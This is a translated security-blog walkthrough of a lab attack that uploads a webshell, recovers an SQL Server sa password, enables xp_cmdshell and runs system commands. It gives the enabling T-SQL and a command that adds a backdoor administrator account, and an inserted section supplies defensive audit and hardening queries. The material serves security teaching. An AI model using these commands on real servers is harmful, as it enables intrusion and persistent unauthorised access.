
110. Network security penetration test - [privilege escalation 8] - [Windows SQL Server xp_cmdshell stored procedure privilege escalation]

2022-07-07 11:56:00 qwsn

In my view, whether studying security or working in security, one more or less has some feelings and a sense of mission!!!

1. Windows SQL Server xp_cmdshell stored procedure privilege escalation

1. Background of xp_cmdshell privilege escalation:

        If the website's database is SQL Server and you obtain the sa password, you can enable the xp_cmdshell stored procedure and execute system commands with the privileges of the SQL Server service. Those are not necessarily SYSTEM privileges; it depends on the permission settings the administrator chose when SQL Server was installed.

2. xp_cmdshell related concepts:

(1) The xp_cmdshell stored procedure [a stored procedure is a collection of one or more SQL statements precompiled into an executable procedure] is used to execute local cmd commands and requires logging in with sa privileges. By default, after SQL Server 2005/2008 is installed, the xp_cmdshell stored procedure is disabled; if you want to use it, you can enable it with: Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

No.  Command                                        Notes
1    Exec sp_configure 'show advanced options',1;   # Allow configuration of advanced options
2    RECONFIGURE;                                   # Reconfigure
3    EXEC sp_configure 'xp_cmdshell',1;             # Enable the xp_cmdshell stored procedure
4    RECONFIGURE;                                   # Reconfigure

(2) Format for executing system commands:

No.  Command                                                                                          Notes
1    Exec master.dbo.xp_cmdshell 'whoami'                                                             # View the current user
2    Exec master.dbo.xp_cmdshell 'net user'                                                           # View all users
3    Exec master.dbo.xp_cmdshell 'systeminfo'                                                         # View OS information
4    Exec master.dbo.xp_cmdshell 'net user test 123 /add & net localgroup administrators test /add'   # Add a user to the administrators group

(3) Disable it after use: Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;

No.  Command                                        Notes
1    Exec sp_configure 'show advanced options',1;   # Allow configuration of advanced options
2    RECONFIGURE;                                   # Reconfigure
3    EXEC sp_configure 'xp_cmdshell',0;             # Disable the xp_cmdshell stored procedure
4    RECONFIGURE;                                   # Reconfigure
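From the defender's side, the same two configuration options are what an audit should check and what hardening should restore. The following T-SQL is an added example and is not part of the original post; it assumes sysadmin rights on the instance, and the service-account query assumes SQL Server 2008 R2 SP1 or later (sys.dm_server_services does not exist in plain 2008). Each sp_configure change also leaves a line in the SQL Server error log, which is the simplest place to look for an unexpected enable.

```sql
-- Added example (not from the original post): audit and re-harden xp_cmdshell.
-- Run as a sysadmin in SSMS or sqlcmd.

-- 1. Current state of the two options the post toggles.
--    value_in_use is what the running instance applies after RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Search the current error log for configuration flips. Every change writes a line like
--    "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."
--    Arguments: 0 = current log, 1 = SQL Server log (not Agent), then the search string.
EXEC master.dbo.xp_readerrorlog 0, 1, N'xp_cmdshell';

-- 3. The Windows account the engine runs as is what a command run through xp_cmdshell
--    gets (the post's "depends on the installation settings").
--    Requires SQL Server 2008 R2 SP1 or later.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 4. Hardened state: disable xp_cmdshell if it is on, then hide advanced options again.
--    Same sequence as the post's disable table, plus re-hiding advanced options.
IF EXISTS (SELECT 1 FROM sys.configurations
           WHERE name = 'xp_cmdshell' AND value_in_use = 1)
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;

-- 5. The post's whole chain depends on the sa login (SID 0x01) being usable;
--    confirm it is disabled, or at least not carrying a weak password like the one found later.
SELECT name, is_disabled
FROM sys.server_principals
WHERE sid = 0x01;
```

Step 2 is worth scheduling: the error-log line is written even when the attacker disables xp_cmdshell again afterwards, as the post's "disable it after use" step does, so it survives the cleanup that the sys.configurations check in step 1 would miss.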

3. xp_cmdshell privilege escalation in practice:

(1) Experimental environment:

1. Target environment:
(1) Virtual machine Windows 2008 [target_sys.com] [192.168.97.131]
(2) Scripting language environment: php/asp language environments are present

2. Attacker:
(1) Virtual machine Win7 [192.168.97.130]
(2) Firefox + Burp Suite + AntSword + a large webshell ("big horse", 大马)

3. Network environment:
(1) NAT network built in VMware

(2) Target link:

URL:http://target_sys.com/upload.php

(3) Experimental process:

Step 1: Visit the target link, use the MIME type to bypass the whitelist restriction, and upload the up.aspx webshell.
[The above process is abbreviated.] The privilege escalation process follows:

Step 2: Connect to the up.aspx webshell [the password is admin], click the [File Manager] module, and search for the SQL Server account and password.

Connecting to the webshell: (screenshot)

SQL Server connection data is usually stored in web.config, config.asp, conn.aspx or database.aspx, but in this environment it is actually in index.aspx of the neighbouring site (www.demo1.com), which stores the user's password as: 123456 (screenshot)

Step 3: Click the [DataBase] module, connect to MSSQL with the sa account just obtained, and note that the SQL Server version is 2008.

The xp_cmdshell stored procedure is used to execute local cmd commands and requires logging in with sa privileges. (screenshot)

Step 4: In the SQLExec drop-down box, select the option Add xp_cmdshell(SQL2005) to enable the xp_cmdshell stored procedure. (screenshots)

Step 5: Use the newly enabled xp_cmdshell stored procedure to execute some system commands with the privileges of the SQL Server service.

Because the current privileges turn out to be those of an ordinary user, only some basic commands can be executed; alternatively, an overflow privilege-escalation tool could be uploaded to further elevate the current user's privileges. (screenshots)


Copyright notice
This article was written by [qwsn]; please include the original link when reposting, thanks.
https://yzsam.com/2022/188/202207070958140490.html
